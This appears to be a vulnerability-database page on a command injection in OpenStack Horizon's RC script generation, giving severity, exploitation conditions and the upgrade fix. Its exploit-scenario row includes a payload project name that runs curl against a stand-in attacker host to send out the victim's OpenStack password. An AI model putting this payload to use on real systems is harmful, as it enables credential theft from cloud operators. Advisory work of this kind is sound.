OpenStack Horizon CVE-2026-55748
MEDIUMSeverity by source
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
PR:H because project creation requires elevated admin rights; AC:H for the multi-step chain requiring crafted name plus victim execution; UI:R mandatory for victim to source the file.
Primary rating from Vendor (mitre).
CVSS VectorVendor: mitre
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
Lifecycle Timeline
1DescriptionCVE.org
OpenStack Horizon before 25.7.4 produces scripts for OpenStack RC file downloading that may have a crafted project name with shell metacharacters. NOTE: some parties consider this a security hardening opportunity to address certain types of user error, not a vulnerability.
AnalysisAI
OpenStack Horizon before 25.7.4 embeds project names unsanitized into generated OpenStack RC shell scripts, enabling OS command injection when a victim user downloads and sources that script locally. An attacker with sufficient privileges to create or control a project name can insert shell metacharacters (e.g., backtick sequences, command substitution syntax) that execute arbitrary commands in the victim's local shell environment upon RC file execution. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the following specific conditions to all be true simultaneously: (1) the attacker must possess OpenStack project creation or project rename privileges - a high-privilege role (PR:H per CVSS) such as cloud admin or a delegated project admin - in order to set a malicious project name containing shell metacharacters; (2) a victim user must subsequently navigate to Horizon, select that specific project, and download the OpenStack RC file for it; and (3) the victim must execute (source) the RC file in a POSIX-compatible shell session. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 6.0 with vector AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L correctly signals moderate-to-medium real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An OpenStack administrator (or any user delegated project creation rights) creates a project named something like 'prod$(curl attacker.com/exfil?k=$OS_PASSWORD)' in a multi-tenant cloud. When a developer or operator navigates to that project in Horizon and downloads the RC file for CLI use, Horizon generates a script containing that unsanitized name. … |
| Remediation | The primary remediation is to upgrade OpenStack Horizon to version 25.7.4 or later, which addresses the unsanitized embedding of project names in RC script generation. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
In OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FIL
The Horizon REST API includes a users endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple pl
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation
Session fixation vulnerability in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 allows remote attackers to hijack we
Open redirect vulnerability in views/auth_forms.py in OpenStack Dashboard (Horizon) Essex (2012.1) allows remote attacke
An issue was discovered in OpenStack Horizon before 15.3.2, 16.x before 16.2.1, 17.x and 18.x before 18.3.3, 18.4.x, and
In OpenNMS Horizon, versions opennms-17.0.0-1 through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2
In OpenNMS Horizon, versions opennms-18.0.0-1 through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2
OpenStack Keystone before 2012.1.1, as used in OpenStack Folsom before Folsom-1 and OpenStack Essex, does not properly i
A BeanShell interpreter in remote server mode runs in OpenMNS Horizon versions earlier than 32.0.2 and in related Meridi
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today